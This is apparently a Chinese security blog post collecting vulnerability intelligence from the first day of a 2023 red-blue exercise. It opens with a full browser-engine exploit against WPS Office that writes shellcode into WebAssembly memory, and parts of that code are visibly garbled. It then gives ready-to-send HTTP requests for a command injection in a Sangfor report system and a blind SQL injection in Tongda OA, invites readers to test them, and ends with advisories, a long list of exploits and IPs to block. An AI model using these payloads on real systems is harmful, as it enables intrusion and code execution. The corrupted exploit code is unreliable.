免责声明
今天是2023年8月9号周三,HW开始第一天,开头直接直接上猛料啊,小弟们快受不住咯!
一、今日份漏洞情报
这个WPS的好像群传开了,直接附上,请自测师傅们
在1.html当前路径下启动http server并监听80端口,修改hosts文件(测试写死的)
漏洞触发需让域名规则满足clientweb.docer.wps.cn.{xxxxx}wps.cn cloudwps.cn和wps.cn没有任何关系
<script>
if(typeof alert === "undefined"){
alert = console.log;
}
let f64 = new Float64Array(1);
let u32 = new Uint32Array(f64.buffer);
function d2u(v) {
f64[0] = v;
return u32;
}
function u2d(lo, hi) {
u32[0] = lo;
u32[1] = hi;
return f64[0];
}
function gc(){ // major
for (let i = 0; i < 0x10; i++) {
new Array(0x100000);
}
}
function foo(bug) {
function C(z) {
Error.prepareStackTrace = function(t, B) {
return B[z].getThis();
};
let p = Error().stack;
Error.prepareStackTrace = null;
return p;
}
function J() {}
var optim = false;
var opt = new Function(
'a', 'b', 'c',
'if(typeof a==='number'){if(a>2){for(var
i=0;i<100;i++);return;}b.d(a,b,1);return}' +
'g++;'.repeat(70));
var e = null;
J.prototype.
'a', 'b' J.prototype. J.prototype.
new Function(
use strict";b.a. new Function('a' new Function(
l(arguments,b);return arguments[a];'); a.b(0,a)');
'a', 'b',
'b.c();if(a){' +
'g++;'.repeat(70) + '}');
J.prototype.c = function() {
if (optim) {
var z = C(3);
var p = C(3);
z[0] = 0;
e = {M: z, C: p};
}
};
var a = new J();
// jit optim
if (bug) {
for (var V = 0; 1E4 > V; V++) {
opt(0 == V % 4 ? 1 : 4, a, 1);
}
}
optim = true;
opt(1, a, 1);
return e;
}
e1 = foo(false);
e2 = foo(true);
delete e2.M[0];
let hole = e2.C[0];
let map = new Map();
map.set('asd', 8);
map.set(hole, 0x8);
map.delete(hole);
map.delete(hole);
map.delete("asd");
map.set(0x20, "aaaa");
let arr3 = new Array(0);
let arr4 = new Array(0);
let arr5 = new Array(1);
let oob_array = [];
oob_array.push(1.1);
map.set("1", -1);
let obj_array = {
m: 1337, target: gc
};
let ab = new ArrayBuffer(1337);
let object_idx = undefined;
let object_idx_flag = undefined;
let max_size = 0x1000;
for (let i = 0; i < max_size; i++) {
if (d2u(oob_array[i])[0] === 0xa72) {
object_idx = i;
object_idx_flag = 1;
break;
}
}
let dv = new DataView(ab);
function get_32(addr) {
let r8 = d2u(oob_array[bk_idx]);
if (bk_idx_flag === 0) {
oob_array[bk_idx] = u2d(addr, r8[1]);
} else {
oob_array[bk_idx] = u2d(r8[0], addr);
}
let val = dv.getUint32(0, true);
oob_array[bk_idx] = u2d(r8[0], r8[1]);
return val;
}
function set_32(addr, val) {
let r8 = d2u(oob_array[bk_idx]);
if (bk_idx_flag === 0) {
oob_array[bk_idx] = u2d(addr, r8[1]);
} else {
oob_array[bk_idx] = u2d(r8[0], addr);
}
dv.setUint32(0, val, true);
oob_array[bk_idx] = u2d(r8[0], r8[1]);
}
function write8(addr, val) {
let r8 = d2u(oob_array[bk_idx]);
if (bk_idx_flag === 0) {
oob_array[bk_idx] = u2d(addr, r8[1]);
} else {
oob_array[bk_idx] = u2d(r8[0], addr);
}
dv.setUint8(0, val);
}
let fake_length = get_32(addrof(oob_array)+12);
set_32(get_32(addrof(oob_array)+8)+4,fake_length);
let wasm_code = new
Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128, 128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128, 128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0 ,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
let wasm_mod = new WebAssembly.Module(wasm_code);
let wasm_instance = new WebAssembly.Instance(wasm_mod);
let f = wasm_instance.exports.main;
let target_addr = addrof(wasm_instance)+0x40;
let rwx_mem = get_32(target_addr);
//alert("rwx_mem is"+rwx_mem.toString(16));
const shellcode = new Uint8Array([0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,
0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30,0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52,0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01,
0xd1,0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49, 0x8b, 0x34, 0x8b,0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03,0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b,0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a, 0x8b, 0x12, 0xeb,0x8d, 0x5d, 0x6a, 0x01, 0x8d, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x50, 0x68, 0x31, 0x8b,
0x6f,0x87, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x68, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5,0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a,0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x00]);
for(let i=0;i<shellcode.length;i++){
write8(rwx_mem+i,shellcode[i]);
}
f();
</script>
360漏洞情报今日更新情况
【演练实时消息】
消息时间:2023-08-09 10:30
消息标题:深信服应用交付报表系统远程命令执行漏洞
消息详情:360漏洞云监测互联网流传:《深信服应用交付报表系统远程命令执行漏洞》 消息,经漏洞云复核,确认为【真实】漏洞。该漏洞POC已经添加到漏洞云情报平台,平台编号:360LDYLD-2023-00002368,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
【演练实时消息】
【消息时间】:2023-08-09 11:30
【消息标题】:泛微 E-Cology ifNewsCheckOutByCurrentUser SQL注入漏洞
【消息详情】:360漏洞云监测互联网流传:《泛微 E-Cology SQL注入漏洞》 消息,经漏洞云复核,确认为【真实】漏洞,漏洞细节互联网暂未公开。该漏洞POC已经添加到漏洞云情报平台,平台编号:360LDYLD-2023-00002376
,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
师傅们,这个也请自测吧!
POST /rep/login HTTP/1.1
Host:
Cookie:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0
Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,*/*;q=0.8 Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2
Accept-Encoding: gzip deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache14 Te: trailers
Connection: close
Content-Type:application/x-www-form-urlencoded
Content-Length: 126 clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid -a %0A&userPsw=tmbhuisq
【演练实时消息】
【消息时间】:2023-08-09 17:50
【消息标题】:WPS Office 远程代码执行漏洞
【消息详情】:360漏洞云监测WPS Office 远程代码执行漏洞消息及Poc,经漏洞云复核,确认为chromium 历史漏洞(编号:CVE-2022-1364,标题:Google Chrome V8类型混淆漏洞)的适配,影响【WPS Office 个人版<11.1.0.15120,WPS office 企业版<11.8.2.12085 】,最新版本WPS Office 不受此漏洞影响。该漏洞POC已经添加到漏洞云情报平台,平台编号:360LDYLD-2023-00002403
,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
这个上面已经附上啦!
【演练实时消息】
【消息时间】:2023-08-09 18:30
【消息标题】:通达OA SQL注入漏洞
【消息详情】:360漏洞云监测到-通达OA SQL注入漏洞(CVE-2023-4166),经漏洞云复核,确认此漏洞为【后台漏洞】,攻击者需要有系统的登录权限,漏洞影响【通达OA<11.10】,官方已经针对此漏洞发布补丁。该漏洞POC已标准化并经添加到漏洞云情报平台,平台编号:360LDYLD-2023-00002385,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
师傅们,这个也请自测吧!
GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=1u7tsd1cpgp9qvco726smb50h5; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=779f3f46
Upgrade-Insecure-Requests: 1
网络安全攻防WiKi(限免)知识星球的漏洞情报
【2023.8.9】
【情报-漏洞预警】
【情报来源】:外部
【漏洞类型】:二进制漏洞
【漏洞危害】:高
SDK Java Technology Edition任意代码执行漏洞(CVE-2022-40609)
Software Developers Kit(SDK)中文意思是IBM 软件开发工具包,包含开发工具和 Java™ 运行时环境。SDK 是可安装的 Java 包,其中包含 Java 应用程序编程接口(API)。行业监测到IBM SDK, Java Technology Edition中存在反序列化漏洞(CVE-2022-40609)。IBM SDK, Java Technology Edition中的对象请求代理 (ORB)易受不可信数据的反序列化漏洞影响,未经身份验证的远程威胁者可发送恶意序列化数据,利用该漏洞在目标系统上执行任意代码。
【影响范围】:
IBM SDK, Java Technology Edition<= 8.0.8.0
IBM SDK, Java Technology Edition<=7.1.5.18
【处置方法】:
目前该漏洞已经修复,受影响用户可升级到以下版本:
IBM SDK, Java Technology Edition 8.0.8.5
IBM SDK, Java Technology Edition7.1.5.19
漏洞名称:H3C多系列设备远程命令执行漏洞(QVD-2022-12205)
漏洞等级:极危
威胁类型:命令执行
漏洞类型:命令注入
CVE 编号:
标签:影响十万级, 在野利用, 关键漏洞
漏洞简述:H3C多系列设备存在远程命令执行漏洞。该漏洞是由设备Web控制台某接口存在的逻辑漏洞造成的。凭借此处漏洞即可获取到设备的终端完全控制权限(ROOT 权限)。
公开日期:2023-08-08
更新日期:2023-08-08 23:37:18
漏洞名称:通达OA 反序列漏洞(QVD-2023-18095)
漏洞等级:高危
威胁类型:代码执行
漏洞类型:反序列化错误
CVE 编号:
标签:技术细节公开, 关键漏洞
漏洞简述:通达OA 由于使用了存在了反序列化漏洞版本的yii框架导致存在反序列化漏洞,攻击者可利用此漏洞执行任意代码。
公开日期:2023-08-04
更新日期:2023-08-08 18:39:21
Exchange Server远程代码执行漏洞(CVE-2023-38182)风险通告 待补充poc exp
描述和影响范围
Exchange Server 2019 Cumulative Update 13
Exchange Server 2019 Cumulative Update 12
Exchange Server 2019 Cumulative Update 11
Exchange Server 2016 Cumulative Update 23
需要有普通用户权限
Airflow是一个开源的工作流自动化平台,它允许用户定义、调度和监视工作流任务的执行。RunTask是通过Airflow的Web界面或命令行工具。
在Airflow受影响版本中,RunTask功能允许用户手动触发执行特定的任务,而不受正常的任务调度和依赖关系限制。当用户没有执行某个特定任务的权限时,可以通过RunTask功能手动触发该任务的执行,从而绕过本应该实施的访问控制和依赖关系。攻击者可以通过RunTask功能,在目标服务器上执行任意代码。由于DAG定义了任务之间的依赖关系和执行顺序,攻击者可以通过RunTask绕过某些DAG的限制。
影响范围:apache-airflow@(-∞,2.6.0)
红蓝攻防实验室公众号情报
2023HW-Day nday集合
1、海康威视综合安防前台文件上传漏洞
2、蓝凌OA前台代码执行漏洞
3、致远M3Server-xxxx反序列化漏洞
4、致远A8V8SP1SP2文件上传漏洞(1dav)
5、普元EOS 前台代码执行漏洞
6、金和OA sql注入
7、泛微E-Mobile任意用户登录(1day)
8、泛微E-Office10信息泄露后台+后台文件上传漏洞(Oday)很牛的组合漏洞
9、契约锁电子签章系统RCE(1day)
10、亿赛通电子文档平台文件上传漏洞
11、ldocview命令执行漏洞
12、jeesite代码执行漏洞Oday
13、LiveBOS文件上传漏洞
14、用友nc-cloud-任意文件写入
15、qax VPN 0day
16、xxIOA PWN
17、xxx准入PWN
18、sxf应用交付系统命令执行
19、协同办公文档(DzzOfffice)未授权访问
20、电子签章平台代码执行漏洞
21、泛微oa进后台漏洞
22、ucloud的未授权获取任意用户cookie
23、飞书客户端RCE漏洞
24、泛微EofficeV10前台RCE
25、来客推商城任意文件上传
26、天玥堡垒机Oday
27、明御运维审计与风险控制系统堡垒机任意用户注册
28、协同管理系统存在SQL注入
29、泛微emobile注入漏洞
30、拓尔思WCM任意命令执行漏洞
31、用友财务云任意文件上传漏洞
32、天眼0day(未证实)
32、绿盟sas安全审计系统任意文件读取
33、Smartbi身份认证绕过漏洞
34、泛微Eoffice10 sql注入
35、海康综合安防平台-Spring-ENV信息泄露-Restful api默认密钥漏洞
36、宏景4个注入2个上传
37、红帆OA一堆0day
38、泛微E-office do_excel组件存在任意文件写入漏洞
39、某御 Leadsec ACM管理平台SQL注入漏洞
40、H3C CVM 前台任意文件上传漏洞
41、通达OA登录认证绕过漏洞
42、TRS-MAS 测试文件远程命令执行漏洞
43、宝塔前台远程代码执行漏洞
44、某恒数据大脑 API 网关任意密码重置漏洞
45、通达OA系统V11.x版本远程代码执行漏洞
46、华天动力OA系统前台任意文件上传漏洞
47、PbootCMS v3.1.2 远程命令执行漏洞
二、恶意IP(建议封禁)
121.40.127.235
203.56.198.50
36.139.90.88
111.30.232.239
49.232.193.91
61.52.4.110
175.27.157.249
162.14.108.149
61.52.1.187
8.130.114.73
101.43.131.124
82.156.151.104
42.192.83.35
36.139.93.155
119.45.116.236
118.195.135.88
39.104.200.136
123.56.94.91
115.159.112.166
39.100.74.7
47.92.204.74
39.104.205.225
47.106.193.231
202.114.144.106
61.171.119.106
39.100.68.7
39.104.205.76
47.99.153.172
39.100.69.32
39.100.67.40
39.100.66.92
39.100.67.4
39.100.71.240
47.92.199.215
1.13.9.165
114.132.55.109
39.100.67.168
103.252.118.75
117.176.227.58
171.15.105.211
182.92.222.186
182.92.171.153
101.200.121.243
47.94.230.88
42.229.37.94
39.107.123.197
61.181.206.56
47.92.146.232
180.103.125.43
42.194.251.210
47.92.193.104
39.100.68.20
39.100.74.176
39.105.189.100
49.234.66.241
112.126.83.111
47.92.222.215
39.107.244.18
39.98.253.124
118.195.252.229
101.200.127.65
119.91.30.216
39.104.22.163
39.104.205.209
118.195.163.139
118.195.151.253
118.178.233.247
39.100.33.106
47.92.153.182
118.195.241.144
106.55.107.106
81.69.18.228
47.92.117.144
39.98.71.2
39.98.207.132
119.45.197.199
39.100.65.171
122.230.40.42
156.255.214.146
115.55.5.252
36.27.112.227
128.90.186.63
49.81.101.133
39.144.230.42
121.76.146.145
115.227.53.220
36.63.124.161
139.214.148.34
218.83.6.211
106.58.246.138
42.236.134.110
220.201.59.247
114.253.103.147
27.202.246.112
42.228.100.149
103.225.84.43
61.147.96.34
219.156.23.174
43.154.112.206
125.83.104.172
180.123.199.17
180.125.235.203
112.248.113.169
113.252.145.146
119.162.122.131
111.201.175.156
182.121.198.156
43.137.9.153
182.114.24.127
125.109.150.118
122.142.195.43
112.248.244.57
180.97.189.166
183.27.124.95
59.175.107.34
58.153.134.157
183.157.44.76
61.54.61.238
111.67.58.35
42.238.153.5
42.239.10.26
124.131.32.11
42.3.201.56
182.127.191.82
115.57.30.175
223.74.158.84
183.27.118.73
106.57.165.109
219.155.86.248
122.140.203.113
220.187.194.231
221.1.226.158
60.246.68.18
119.139.137.132
182.121.53.223
115.171.206.56
123.118.11.71
123.235.145.137
115.60.49.192
180.123.198.188
180.97.189.153
223.15.54.102
180.97.189.156
222.141.113.126
14.18.105.198
113.74.128.95
122.230.40.5
223.16.215.117
42.240.129.52
222.137.112.11
42.225.48.25
125.41.208.109
211.101.236.135
219.156.153.239
18.162.213.61
220.192.145.31
42.3.201.202
42.176.169.245
106.110.134.126
52.5.118.182
185.254.37.216
183.136.225.31
39.144.228.147
223.104.90.135
117.61.1.151
122.13.77.124
119.4.175.235
223.104.241.10
111.196.58.238
39.144.230.203
120.216.234.69
47.98.172.144
47.110.180.32
47.110.180.33
47.110.180.34
47.110.180.35
124.77.171.243
124.220.162.36
42.84.161.64
113.160.72.162
192.241.222.93
192.241.219.50
142.93.54.161
45.155.91.247
205.210.31.37
89.248.165.56
121.254.147.246
112.66.243.132
45.137.116.63
23.89.5.60
104.131.128.14
198.199.104.48
103.224.212.221
104.236.128.30
103.224.212.220
253.157.14.165
45.55.35.54
49.2.123.56
138.68.133.118
154.58.31.66
199.254.199.244
189.129.149.114
118.89.58.55
192.241.197.11
190.211.252.50
4.2.2.2
212.192.202.119
192.241.196.108
45.128.232.62
83.35.39.231
185.200.118.79
103.137.63.117
202.103.251.246
146.19.191.108
143.110.192.203
190.210.152.148
77.4.7.92
146.148.34.125
5.133.168.15
111.192.102.213
198.199.107.20
196.10.89.62
197.4.4.12
162.243.136.62
105.112.249.195
185.200.118.67
192.241.232.36
112.248.62.247
161.97.89.210
54.76.135.1
165.22.68.119
183.136.225.31
87.236.176.180
107.148.149.146
192.241.208.62
178.128.227.204
89.165.3.27
185.200.116.72
192.241.204.26
49.93.164.238
198.199.108.20
249.129.46.48
107.170.237.74
107.170.237.73
189.163.17.5
185.85.188.62
192.155.88.231
189.146.237.73
88.204.179.118
199.254.199.225
138.68.208.29
190.12.59.131
198.98.183.144
87.236.176.151
118.5.49.6
198.199.105.69
68.183.13.61
89.248.163.209
47.92.5.158
37.139.129.26
103.78.150.209
188.5.4.96
82.200.154.210
162.243.136.42
165.232.73.237
189.163.152.29
192.241.197.21
120.78.171.32
2.57.149.93
162.243.134.28
使用需知
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
封面图片来源网络,如有侵权联系必删。
安全小白,不喜绕过。
仅供参考,请勿用于违法行为,如有侵权以及各种情况可以私聊!
原文始发于微信公众号(天启实验室):HW第一天0day以及恶意IP简单汇总
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论